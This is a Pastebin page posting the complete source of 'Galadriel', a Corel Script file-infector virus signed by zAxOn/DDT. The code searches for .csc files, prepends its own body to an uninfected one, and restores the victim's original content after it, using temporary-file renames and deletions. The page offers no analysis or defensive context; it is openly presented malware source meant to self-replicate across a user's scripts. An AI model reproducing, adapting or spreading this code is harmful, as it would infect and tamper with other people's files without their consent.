Advertisement
FlyFar

Virus.CSC.CSV.d - Source Code

Jun 13th, 2023
629
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 1.21 KB | Cybersecurity | 0 0
  1.    REM ViRUS GaLaDRieL FOR COREL SCRIPT bY zAxOn/DDT
  2.    mynombre$=FindFirstFolder ("*.csc",32 or 128)
  3.    Do while not mynombre$=""
  4.    Open mynombre$ For Input As #1
  5.    Palacios_Intemporales:
  6.    Line Input #1,linea$
  7.    If linea$="" then goto Palacios_Intemporales
  8.    if victima_bool=1 Then Goto Esgaroth
  9.    If Instr(linea$,"REM ViRUS",1)=0 then
  10.    vic_tima$=mynombre$
  11.    victima_bool=1
  12.    End if
  13.    Esgaroth:
  14.    If Instr(linea$,"REM ViRUS",1)<> 0 Then
  15.    yo_estoy_en$=mynombre$
  16.    conocimiento=1
  17.    End if
  18.    Close
  19.    If conocimiento=1 Then If victima_bool=1 Then Goto LothLorien
  20.    mynombre$=FindNextFolder ()
  21.    If mynombre$="" Then Goto Los_Puertos_Grises
  22.    Loop
  23.    LothLorien:
  24.    Kill "mallorn.tmp"
  25.    Rename vic_tima$,"mallorn.tmp",0
  26.    Open yo_estoy_en$ For Input As #1
  27.    open vic_tima$ For Output As #2
  28.    Do While Not Left(linea$,7)="REM END"
  29.    Line Input #1,linea$
  30.    Print #2,linea$
  31.    Loop
  32.    Line Input #1,linea$
  33.    Print #2,linea$
  34.    Close
  35.    Open vic_tima$ For Append As #1
  36.    Open "mallorn.tmp" For Input As #2
  37.    Do While Not Eof(2)
  38.    Line Input #2,linea$
  39.    Print #1,linea$
  40.    Loop
  41.    Close
  42.    Kill "mallorn.tmp"
  43.    Los_Puertos_Grises:
  44.    REM END OF ViRUS GaLaDRieL bY zAxOn/DDT
Tags: csc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement